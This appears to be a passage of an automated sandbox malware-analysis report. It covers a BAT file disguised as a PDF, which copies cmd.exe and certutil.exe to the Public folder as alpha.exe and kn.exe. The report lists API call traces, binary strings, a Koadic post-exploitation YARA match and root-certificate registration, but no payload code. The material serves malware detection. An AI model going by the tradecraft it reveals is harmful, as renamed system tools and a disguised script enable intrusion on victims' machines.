Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5479BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,6_2_00007FF6C5479BC8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54FBBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF6C54FBBC0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F3BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54F3BEB
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1662113881.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1665632845.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1671358819.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1673888416.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000002.1677036261.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000000.1674461532.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1681056621.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1679714950.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source: Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1662113881.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1665632845.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1671358819.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1673888416.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000002.1677036261.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000000.1674461532.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1681056621.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1679714950.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,3_2_00007FF755CB823C
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,3_2_00007FF755CB2978
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CA35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,3_2_00007FF755CA35B8
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CA1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,3_2_00007FF755CA1560
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CC7B4C FindFirstFileW,FindNextFileW,FindClose,3_2_00007FF755CC7B4C
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,5_2_00007FF755CB823C
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CB2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,5_2_00007FF755CB2978
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CA35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,5_2_00007FF755CA35B8
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CA1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00007FF755CA1560
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CC7B4C FindFirstFileW,FindNextFileW,FindClose,5_2_00007FF755CC7B4C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54CC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,6_2_00007FF6C54CC6F8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C553234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,6_2_00007FF6C553234C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5533100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF6C5533100
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55310C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF6C55310C4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5536F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,6_2_00007FF6C5536F80
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5513674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,6_2_00007FF6C5513674
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,6_2_00007FF6C54DD4A4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C549D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C549D440
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF6C54DB3D8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,6_2_00007FF6C54D5E58
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5531B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,6_2_00007FF6C5531B04
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55319F8 #359,FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF6C55319F8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,6_2_00007FF6C54DDBC0
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,9_2_00007FF755CB823C
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CB2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,9_2_00007FF755CB2978
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CA35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,9_2_00007FF755CA35B8
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CA1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,9_2_00007FF755CA1560
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CC7B4C FindFirstFileW,FindNextFileW,FindClose,9_2_00007FF755CC7B4C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF755CB823C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF755CB2978
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF755CA35B8
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF755CA1560
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CC7B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF755CC7B4C
Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: kn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
Source: kn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.drString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
Source: kn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.drString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token

E-Banking Fraud

barindex
Registers a new ROOT certificate
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54AB684 CertCompareCertificateName,#357,#357,CertEnumCertificatesInStore,CertCompareCertificateName,CertComparePublicKeyInfo,memcmp,#357,CertEnumCertificatesInStore,#357,CertFreeCertificateContext,CertAddCertificateContextToStore,GetLastError,6_2_00007FF6C54AB684
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,6_2_00007FF6C54B25E8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C552A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF6C552A740
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54EE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF6C54EE1F8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5526EA8 NCryptImportKey,#360,6_2_00007FF6C5526EA8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F0EF4 NCryptImportKey,#205,#359,#359,#357,6_2_00007FF6C54F0EF4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,6_2_00007FF6C54E0F58
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,6_2_00007FF6C54DEA7C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF6C54B29A0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55298B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF6C55298B0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,6_2_00007FF6C54E184C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55293A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_00007FF6C55293A0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6C54F342C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,6_2_00007FF6C547F9B8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C548FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,6_2_00007FF6C548FC20

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 1x40 CONTAINER.PDF-.bat, type: SAMPLEMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
Found large BAT file
Source: 1x40 CONTAINER.PDF-.batStatic file information: 3675586
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB89E4 NtQueryInformationToken,NtQueryInformationToken,3_2_00007FF755CB89E4
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CA3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,3_2_00007FF755CA3D94
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB898C NtQueryInformationToken,3_2_00007FF755CB898C
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CD1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,3_2_00007FF755CD1538
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CCBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,3_2_00007FF755CCBCF0
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,3_2_00007FF755CB8114
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,3_2_00007FF755CB88C0
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,3_2_00007FF755CB7FF8
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CB89E4 NtQueryInformationToken,NtQueryInformationToken,5_2_00007FF755CB89E4
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CA3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,5_2_00007FF755CA3D94
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CB898C NtQueryInformationToken,5_2_00007FF755CB898C
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CD1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,5_2_00007FF755CD1538
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CCBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,5_2_00007FF755CCBCF0
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CB8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,5_2_00007FF755CB8114
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CB88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,5_2_00007FF755CB88C0
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CB7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,5_2_00007FF755CB7FF8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C554C964 NtQuerySystemTime,RtlTimeToSecondsSince1970,6_2_00007FF6C554C964
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CB8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,9_2_00007FF755CB8114
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CB7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,9_2_00007FF755CB7FF8
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CB89E4 NtQueryInformationToken,NtQueryInformationToken,9_2_00007FF755CB89E4
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CA3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,9_2_00007FF755CA3D94
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CB898C NtQueryInformationToken,9_2_00007FF755CB898C
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CD1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,9_2_00007FF755CD1538
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CCBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,9_2_00007FF755CCBCF0
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CB88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,9_2_00007FF755CB88C0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB89E4 NtQueryInformationToken,NtQueryInformationToken,10_2_00007FF755CB89E4
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CA3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,10_2_00007FF755CA3D94
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB898C NtQueryInformationToken,10_2_00007FF755CB898C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CD1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,10_2_00007FF755CD1538
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CCBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,10_2_00007FF755CCBCF0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,10_2_00007FF755CB8114
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,10_2_00007FF755CB88C0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,10_2_00007FF755CB7FF8
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CA5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,3_2_00007FF755CA5240
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB4224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,3_2_00007FF755CB4224
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB0A6C3_2_00007FF755CB0A6C
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB42243_2_00007FF755CB4224
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CAAA543_2_00007FF755CAAA54
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB55543_2_00007FF755CB5554
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB37D83_2_00007FF755CB37D8
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CA6EE43_2_00007FF755CA6EE4
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CC7F003_2_00007FF755CC7F00
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CCEE883_2_00007FF755CCEE88
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CAE6803_2_00007FF755CAE680
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CA4A303_2_00007FF755CA4A30
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CCAA303_2_00007FF755CCAA30
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CA22203_2_00007FF755CA2220
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CA76503_2_00007FF755CA7650
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CAD2503_2_00007FF755CAD250
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CA9E503_2_00007FF755CA9E50
